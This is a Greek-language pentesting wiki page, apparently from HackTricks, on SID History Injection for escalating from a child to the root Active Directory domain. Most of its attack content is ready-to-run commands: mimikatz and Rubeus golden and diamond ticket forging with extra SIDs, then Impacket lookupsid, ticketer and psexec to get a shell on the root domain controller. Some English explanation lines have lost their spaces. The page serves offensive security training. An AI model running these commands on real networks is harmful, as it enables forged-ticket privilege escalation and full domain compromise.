Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Ο στόχος της επίθεσης SID History Injection είναι να βοηθήσει στη μετάβαση του χρήστη μεταξύ τομέων ενώ εξασφαλίζει τη συνεχή πρόσβαση σε πόρους από τον προηγούμενο τομέα. Αυτό επιτυγχάνεται με την ενσωμάτωση του προηγούμενου Security Identifier (SID) του χρήστη στο SID History του νέου λογαριασμού του. Είναι σημαντικό να σημειωθεί ότι αυτή η διαδικασία μπορεί να χρησιμοποιηθεί για να παραχωρηθεί μη εξουσιοδοτημένη πρόσβαση προσθέτοντας το SID μιας ομάδας υψηλών προνομίων (όπως οι Enterprise Admins ή οι Domain Admins) από το γονικό τομέα στο SID History. Αυτή η εκμετάλλευση παρέχει πρόσβαση σε όλους τους πόρους εντός του γονικού τομέα.
Υπάρχουν δύο μέθοδοι για την εκτέλεση αυτής της επίθεσης: μέσω της δημιουργίας ενός Golden Ticket ή ενός Diamond Ticket.
Για να εντοπίσετε το SID της ομάδας "Enterprise Admins", πρέπει πρώτα να εντοπίσετε το SID του ριζικού τομέα. Αφού εντοπίσετε το SID, το SID της ομάδας Enterprise Admins μπορεί να δημιουργηθεί προσθέτοντας το -519 στο SID του ριζικού τομέα. Για παράδειγμα, αν το SID του ριζικού τομέα είναι S-1-5-21-280534878-1496970234-700767426, το αποτέλεσμα SID για την ομάδα "Enterprise Admins" θα ήταν S-1-5-21-280534878-1496970234-700767426-519.
Μπορείτε επίσης να χρησιμοποιήσετε τις ομάδες Domain Admins, οι οποίες τελειώνουν σε 512.
Ένας άλλος τρόπος για να βρείτε το SID μιας ομάδας από τον άλλο τομέα (για παράδειγμα "Domain Admins") είναι με:
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
/useristheusernametoimpersonate (could beanything)/domainisthecurrentdomain./sidisthecurrentdomainSID./sidsistheSIDofthetargetgrouptoaddourselvesto./aes256istheAES256keyofthecurrentdomain's krbtgt account.--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option/startoffset sets the start time of the ticket to 10 mins before the current time./endin sets the expiry date for the ticket to 60 mins./renewmax sets how long the ticket can be valid for if renewed.# The previous command will generate a file called ticket.kirbi# Just loading you can perform a dcsync attack agains the domain
Για περισσότερες πληροφορίες σχετικά με τα χρυσά εισιτήρια, ελέγξτε:
Διαμαντένιο εισιτήριο (Rubeus + KRBTGT-AES256)
# Use the /sids paramRubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
# Or a ptt with a golden ticketRubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
# You can use "Administrator" as username or any other string
Για περισσότερες πληροφορίες σχετικά με τα diamond tickets, ελέγξτε:
# This is for an attack from child to root domain# Get child domain SIDlookupsid.py<child_domain>/username@10.10.10.10|grep"Domain SID"# Get root domain SIDlookupsid.py<child_domain>/username@10.10.10.10|grep-B20"Enterprise Admins"|grep"Domain SID"# Generate golden ticketticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING# JUST USE THE SAME USERNAME IN THE NEXT STEPS# Load ticketexport KRB5CCNAME=hacker.ccache# psexec in domain controller of rootpsexec.py<child_domain>/Administrator@dc.root.local-k-no-pass-target-ip10.10.10.10
Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!